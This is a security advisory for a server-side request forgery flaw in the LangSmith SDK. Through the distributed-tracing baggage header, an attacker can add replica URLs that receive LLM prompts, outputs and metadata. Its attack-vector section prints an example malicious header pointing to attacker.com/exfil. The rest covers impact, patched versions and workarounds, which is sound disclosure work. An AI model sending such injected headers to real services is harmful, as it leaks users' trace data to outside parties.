PT-2026-59239 · Pypi · Langsmith
Publicado
2026-07-13
·
Atualizado
2026-07-13
CVSS v3.1
5.8
Média
| Vetor | AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N |
Summary
The LangSmith SDK's distributed tracing feature is vulnerable to Server-Side Request Forgery via malicious HTTP headers. An attacker can inject arbitrary
api url values through the baggage header, causing the SDK to exfiltrate sensitive trace data to attacker-controlled endpoints.Description
When using distributed tracing, the SDK parses incoming HTTP headers via
RunTree.from headers() in Python or RunTree.fromHeaders() in Typescript. The baggage header can contain replica configurations including api url and api key fields.Prior to the fix, these attacker-controlled values were accepted without validation. When a traced operation completes, the SDK's
post() and patch() methods send run data to all configured replica URLs, including any injected by an attacker.Attack Vector
- Attacker sends an HTTP request to a vulnerable service with a malicious
baggageheader:
baggage: langsmith-replicas=[{"api url":"https://attacker.com/exfil","project name":"x"}]-
The service parses the header via
RunTree.from headers(), storing the attacker's URL -
When the traced operation completes, the SDK sends the full run data (including LLM inputs, outputs, and metadata) to
https://attacker.com/exfil
Impact
- Data Exfiltration: Sensitive trace data including LLM prompts, completions, and application metadata sent to attacker-controlled servers
- SSRF: Ability to make the server send requests to arbitrary URLs, potentially targeting internal services
Affected Use Cases
Applications are vulnerable if they:
- Use
TracingMiddlewareto automatically propagate tracing context - Call
RunTree.from headers()/RunTree.fromHeaders()with untrusted HTTP headers
Remediation
Update to the patched versions:
- Python:
pip install langsmith>=0.6.3 - JavaScript:
npm install langsmith@>=0.4.6
The fix filters incoming replica configurations to an allowlist of safe fields, removing
api url, api key, and other credential fields.Workarounds
If unable to upgrade immediately:
- Strip or validate the
baggageheader before passing tofrom headers() - Do not use
TracingMiddlewarewith untrusted traffic
Correção
Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
Identificadores relacionados
Produtos afetados
Langsmith